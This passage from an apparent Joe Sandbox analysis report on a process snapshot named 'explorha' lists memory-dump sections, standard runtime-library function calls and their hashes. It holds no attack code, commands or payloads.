                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                      • String ID:
                                                                                                      • API String ID: 1321587334-0
                                                                                                      • Opcode ID: e9ccd4340980efb60135b0313576795e36bbc3501eecbab44c729e9519b2a874
                                                                                                      • Instruction ID: a7f030993e7f715a196a8e65130de1ad563ab01dde32415c2ecfe0fdfc319219
                                                                                                      • Opcode Fuzzy Hash: e9ccd4340980efb60135b0313576795e36bbc3501eecbab44c729e9519b2a874
                                                                                                      • Instruction Fuzzy Hash: CA81CE72A0452ADFCF18EFA8D8819BEBBB5FB48304B24442DD546E7641DB309A41CF81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088806A Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 008880AF
                                                                                                      • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 008880E1
                                                                                                      • List.LIBCONCRT ref: 0088811C
                                                                                                      • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 0088812D
                                                                                                      • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00888149
                                                                                                      • List.LIBCONCRT ref: 00888184
                                                                                                      • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00888195
                                                                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 008881B0
                                                                                                      • List.LIBCONCRT ref: 008881EB
                                                                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 008881F8
                                                                                                        • Part of subcall function 0088756F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00887587
                                                                                                        • Part of subcall function 0088756F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00887599
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                      • String ID:
                                                                                                      • API String ID: 3403738998-0
                                                                                                      • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                      • Instruction ID: 19059f832d7bbff8da5ba4d2e5e3f115d8805299612c7d892f4b97b1a940d43a
                                                                                                      • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                      • Instruction Fuzzy Hash: 7E514D75A00209EBDB04EFA4C995BEDB3A8FF08304F544069E905EB282DF30EE45CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00896935 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00896A30
                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 00896A57
                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00896B63
                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00896C3E
                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 00896CE0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 4162181273-393685449
                                                                                                      • Opcode ID: d44c1c682a52fa81a18c0eda1c9bd94d3c456dfafb79210a1ae8118131f913d0
                                                                                                      • Instruction ID: 9c065c7289c1adcad1988cc498fd0a8f5aa0e6cac750f70983175f982f6117f6
                                                                                                      • Opcode Fuzzy Hash: d44c1c682a52fa81a18c0eda1c9bd94d3c456dfafb79210a1ae8118131f913d0
                                                                                                      • Instruction Fuzzy Hash: 75C14B718002199FCF25EFA8C8819AEBBB5FF04314F18455AF851EB216E735DA61CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008889F4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00888A40
                                                                                                      • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00888A82
                                                                                                      • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00888A9E
                                                                                                      • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00888AA9
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00888AD0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                      • String ID: count$ppVirtualProcessorRoots
                                                                                                      • API String ID: 3897347962-3650809737
                                                                                                      • Opcode ID: b8d83801b1b0ba7588fa2cd29a10a0d5445bf372047b60212eb27e572459211d
                                                                                                      • Instruction ID: 42568bb829c579c5c8a087061869b14cb99eb3a042b4d2badfc1604fe93e82f1
                                                                                                      • Opcode Fuzzy Hash: b8d83801b1b0ba7588fa2cd29a10a0d5445bf372047b60212eb27e572459211d
                                                                                                      • Instruction Fuzzy Hash: DD213C34A00219EFDF18EFA8C995AADB7B5FF45340F444069E905E7392DB34AE05CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00888F71 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00888F93
                                                                                                        • Part of subcall function 00887348: __EH_prolog3_catch.LIBCMT ref: 0088734F
                                                                                                        • Part of subcall function 00887348: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00887388
                                                                                                      • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00888FBA
                                                                                                      • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00888FC6
                                                                                                        • Part of subcall function 00887348: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00887400
                                                                                                        • Part of subcall function 00887348: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 0088740E
                                                                                                      • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00889012
                                                                                                      • Concurrency::location::_Assign.LIBCMT ref: 00889033
                                                                                                      • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 0088903B
                                                                                                      • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0088904D
                                                                                                      • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 0088907D
                                                                                                        • Part of subcall function 00887FAD: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00887FD2
                                                                                                        • Part of subcall function 00887FAD: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00887FF5
                                                                                                      Memory Dump Source
